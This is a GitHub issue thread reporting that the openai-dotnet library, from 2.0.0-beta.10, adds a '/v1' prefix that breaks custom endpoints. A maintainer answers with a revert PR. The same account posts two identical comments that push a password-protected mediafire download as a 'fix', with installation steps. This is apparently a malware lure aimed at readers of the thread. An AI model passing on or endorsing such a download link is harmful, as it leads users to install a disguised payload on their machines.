### ISSUE TITLE
Special custom endpoint not available

### ISSUE THREAD

**Issue by JadynWong** [openai/openai-dotnet#191]
### Confirm this is not an issue with the underlying OpenAI API

- [X] This is an issue with the Python library

### Confirm this is not an issue with Azure OpenAI

- [X] This is not an issue with Azure OpenAI

### Describe the bug

After the #186 merged (2.0.0-beta.10), special custom endpoints are no longer available. All clients have a '/v1' path prefix. This is different from the behavior of the Python version.

Such as `https://open.bigmodel.cn/api/paas/v4` and other special custom endpoints.

### To Reproduce

1. Execute chat completions by a special endpoint.
```
var client = new OpenAIClient("api-key", new()
        {
            Endpoint = new Uri("https://open.bigmodel.cn/api/paas/v4")
        });
var chatClient = client.GetChatClient("glm-4");
ChatCompletion completion = client.CompleteChat("Say 'this is a test.'");
```
2. 
Got 404 exception. The chat completions link is build as "https://open.bigmodel.cn/api/paas/v4/v1/chat/completions". It should be "https://open.bigmodel.cn/api/paas/v4/chat/completions".

### OS

windows

### .NET version

8.0

### Library version

2.0.0-beta.10

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by joseharriaga** [comment]
Thank you for reaching out, @JadynWong ! I created the following PR reverting this change: 🔗 https://github.com/openai/openai-dotnet/pull/192

It will go out in the next preview version, which we hope to release within the next few days.
